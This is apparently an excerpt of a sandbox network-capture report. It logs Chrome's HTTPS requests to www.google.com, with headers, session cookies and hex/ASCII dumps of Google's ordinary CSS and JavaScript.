2024-09-26 15:55:29 UTC	665	IN	Data Raw: 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 6d 61 74 65 72 69 61 6c 2f 73 79 73 74 65 6d 2f 31 78 2f 64 6f 6e 65 5f 62 6c 61 63 6b 5f 31 36 64 70 2e 70 6e 67 29 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e Data Ascii: nDe{background:no-repeat left 8px center}.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)}@media (forced-colors:active){.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.16	49756	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	1328	OUT	GET /client_204?cs=1&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:29 UTC	1164	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-15dYWdgM9TWIeahTrdIqag' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 26 Sep 2024 15:55:29 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g; expires=Fri, 28-Mar-2025 15:55:27 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.16	49760	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	2980	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sy [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:29 UTC	826	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 507559 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 15:55:28 GMT Expires: Fri, 26 Sep 2025 15:55:28 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 1 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:29 UTC	564	IN	Data Raw: 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 22 63 2d 77 69 7a 7b 63 6f 6e 74 61 69 6e 3a 73 74 79 6c 65 7d 63 2d 77 69 7a 3e 63 2d 64 61 74 61 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 72 45 54 53 44 7b 63 6f 6e 74 61 69 6e 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 55 62 69 38 5a 7b 63 6f 6e 74 61 69 6e 3a 6c 61 79 6f 75 74 20 73 74 79 6c 65 7d 2e 6a 62 42 49 74 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 44 55 30 4e 4a 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 6c 50 33 4a 6f 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c Data Ascii: _F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:rel
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 6e 69 74 65 20 62 6f 74 68 2c 71 6c 69 2d 62 6c 75 65 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 49 45 71 69 41 66 7b 61 6e 69 6d 61 74 69 6f 6e 3a 71 6c 69 2d 66 69 6c 6c 2d 75 6e 66 69 6c 6c 2d 72 6f 74 61 74 65 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 2c 71 6c 69 2d 72 65 64 2d 66 61 64 65 2d 69 6e 2d 6f 75 74 20 35 33 33 32 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 34 2c 30 2c 30 2e 32 2c 31 29 20 69 6e 66 69 6e 69 74 65 20 62 6f 74 68 7d 2e 6e 4e 4d 75 4f 64 20 2e 73 6d 6f 63 73 Data Ascii: nite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocs
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 30 7d 37 35 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 39 30 25 7b 6f 70 61 63 69 74 79 3a 30 2e 39 39 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 62 65 44 51 50 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 35 30 25 7d 2e 46 63 58 66 69 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 34 35 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 25 7d 2e 53 50 4b 46 6d 63 7b 62 6f 72 64 65 72 2d 72 61 64 69 Data Ascii: 0}75%{opacity:0.99}90%{opacity:0.99}100%{opacity:0}}.beDQP{display:inline-block;height:100%;overflow:hidden;position:relative;width:50%}.FcXfi{box-sizing:border-box;height:100%;left:45%;overflow:hidden;position:absolute;top:0;width:10%}.SPKFmc{border-radi
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 20 2e 6e 4e 4d 75 4f 64 20 2e 74 53 33 50 35 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 45 70 46 4e 57 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 6c 65 66 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 33 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 6c 69 2d 72 69 67 68 74 2d 73 70 69 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 33 30 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a Data Ascii: .nNMuOd .tS3P5{border-color:var(--EpFNW);border-bottom-color:transparent}@keyframes qli-left-spin{0%{transform:rotate(130deg)}50%{transform:rotate(-5deg)}100%{transform:rotate(130deg)}}@keyframes qli-right-spin{0%{transform:rotate(-130deg)}50%{transform:
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 77 69 64 74 68 3a 31 30 30 25 7d 2e 5a 65 56 42 74 63 7b 63 6f 6c 6f 72 3a 72 67 62 28 39 35 2c 39 39 2c 31 30 34 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 5c 22 2c 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 61 6c 54 42 51 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 32 2c 32 33 32 2c 32 33 30 29 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 Data Ascii: width:100%}.ZeVBtc{color:rgb(95,99,104);font-family:\"Google Sans\",Roboto,Arial,sans-serif;font-size:16px;line-height:25px;max-width:300px}.alTBQe{align-items:center;background-color:rgb(252,232,230);border-top-left-radius:8px;border-top-right-radius:8px
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 7d 2e 50 58 54 36 63 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 34 70 78 7d 2e 63 42 39 4d 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 36 30 2c 36 34 2c 36 37 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 36 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 Data Ascii: to,Arial,sans-serif;font-size:14px;margin-left:20px;margin-right:20px}.PXT6cd{display:flex;margin-top:14px}.cB9M7{background-color:#fff;border:1px solid rgb(218,220,224);color:rgb(60,64,67);border-radius:36px;display:inline-flex;flex-grow:1;font-size:14px
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 61 22 29 3b 0a 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 62 64 22 29 3b 0a 76 61 72 20 6e 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 32 31 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 64 25 34 21 3d 33 26 26 28 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 61 5b 64 5d 5e 63 29 2c 63 2b 2b 29 3b 72 65 74 75 72 6e 20 62 7d 2c 6f 67 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 2c 63 3b 66 6f 72 28 63 20 69 6e 20 61 29 69 66 28 61 5b 63 5d 2e 65 29 69 66 28 61 5b 63 5d 2e 62 29 62 2b 2b 3b 65 6c 73 65 Data Ascii: n(e)}try{_.w("aa");_.y();}catch(e){_._DumpException(e)}try{_.w("abd");var ngi=function(a){for(var b="",c=21,d=0;d<a.length;d++)d%4!=3&&(b+=String.fromCharCode(a[d]^c),c++);return b},ogi=function(a){var b=0,c;for(c in a)if(a[c].e)if(a[c].b)b++;else
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 22 4a 48 48 4b 75 62 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 43 6c 69 65 6e 74 2d 50 63 74 78 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 71 66 49 30 5a 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 65 61 72 63 68 2d 43 69 2d 46 69 22 2c 5f 2e 51 6b 28 62 29 29 3b 62 3d 5f 2e 4c 63 28 22 41 55 66 37 71 63 22 29 3b 62 2e 4b 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 53 69 6c 6b 2d 43 61 70 61 62 69 6c 69 74 69 65 73 22 2c 5f 2e 51 6b 28 62 29 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 4b 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 22 7d 3b 5f 2e 7a 4b 62 3d 21 31 3b 0a 7d 63 61 Data Ascii: "JHHKub");b.Kb()&&a.set("X-Client-Pctx",_.Qk(b));b=_.Lc("qfI0Zc");b.Kb()&&a.set("X-Search-Ci-Fi",_.Qk(b));b=_.Lc("AUf7qc");b.Kb()&&a.set("X-Silk-Capabilities",_.Qk(b));return a};}catch(e){_._DumpException(e)}try{_.yKb=function(){return""};_.zKb=!1;}ca
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 64 20 30 3f 6e 65 77 20 4d 61 70 3a 65 2e 63 6f 6e 74 65 78 74 3b 76 61 72 20 6b 3d 65 2e 7a 66 3d 3d 3d 76 6f 69 64 20 30 3f 6e 65 77 20 4d 61 70 3a 65 2e 7a 66 3b 76 61 72 20 6c 3d 65 2e 61 47 3b 76 61 72 20 70 3d 65 2e 56 6e 62 3b 76 61 72 20 72 3d 65 2e 72 37 3b 76 61 72 20 74 3d 65 2e 68 4a 3b 76 61 72 20 78 3d 65 2e 4c 64 63 3b 65 3d 65 2e 71 24 61 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 67 3b 68 3d 6e 65 77 20 4d 61 70 28 5b 5d 2e 63 6f 6e 63 61 74 28 5f 2e 6c 64 28 68 29 29 29 3b 68 2e 68 61 73 28 22 5f 66 6d 74 22 29 7c 7c 68 2e 73 65 74 28 22 5f 66 6d 74 22 2c 22 70 72 6f 67 22 29 3b 66 26 26 68 2e 73 65 74 28 22 5f 69 64 22 2c 66 29 3b 28 66 3d 61 2e 66 79 61 29 26 26 68 2e 73 65 74 28 22 5f 78 73 72 66 22 2c 66 29 3b 6b 3d 6e 65 77 Data Ascii: d 0?new Map:e.context;var k=e.zf===void 0?new Map:e.zf;var l=e.aG;var p=e.Vnb;var r=e.r7;var t=e.hJ;var x=e.Ldc;e=e.q$a;g=g===void 0?!1:g;h=new Map([].concat(_.ld(h)));h.has("_fmt")\|\|h.set("_fmt","prog");f&&h.set("_id",f);(f=a.fya)&&h.set("_xsrf",f);k=new
2024-09-26 15:55:29 UTC	1390	IN	Data Raw: 3d 5f 2e 71 64 28 68 29 29 26 26 78 2e 73 65 74 28 22 76 65 74 22 2c 64 29 29 3b 66 3f 28 78 2e 73 65 74 28 22 76 65 64 22 2c 66 29 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 26 26 78 2e 73 65 74 28 22 62 6c 22 2c 67 6f 6f 67 6c 65 2e 6b 42 4c 29 2c 67 6f 6f 67 6c 65 2e 73 6e 26 26 78 2e 73 65 74 28 22 73 22 2c 67 6f 6f 67 6c 65 2e 73 6e 29 29 3a 78 2e 73 65 74 28 22 65 69 22 2c 65 7c 7c 28 30 2c 5f 2e 56 6b 2e 76 7a 29 28 29 29 3b 67 26 26 78 2e 73 65 74 28 22 6c 65 69 22 2c 67 29 3b 5f 2e 4a 6a 61 28 78 2c 21 31 2c 21 30 29 3b 67 6f 6f 67 6c 65 2e 75 64 6d 26 26 78 2e 73 65 74 28 22 75 64 6d 22 2c 67 6f 6f 67 6c 65 2e 75 64 6d 29 3b 5f 2e 49 71 62 28 78 29 3b 78 2e 73 65 74 28 22 79 76 22 2c 22 33 22 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: =_.qd(h))&&x.set("vet",d));f?(x.set("ved",f),google.kBL&&x.set("bl",google.kBL),google.sn&&x.set("s",google.sn)):x.set("ei",e\|\|(0,_.Vk.vz)());g&&x.set("lei",g);_.Jja(x,!1,!0);google.udm&&x.set("udm",google.udm);_.Iqb(x);x.set("yv","3");b.forEach(function(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.16	49761	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	2812	OUT	GET /async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3 [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:29 UTC	1036	IN	HTTP/1.1 200 OK Version: 677663421 X-Content-Type-Options: nosniff Content-Type: text/plain; charset=UTF-8 Content-Disposition: attachment; filename="f.txt" Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:29 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
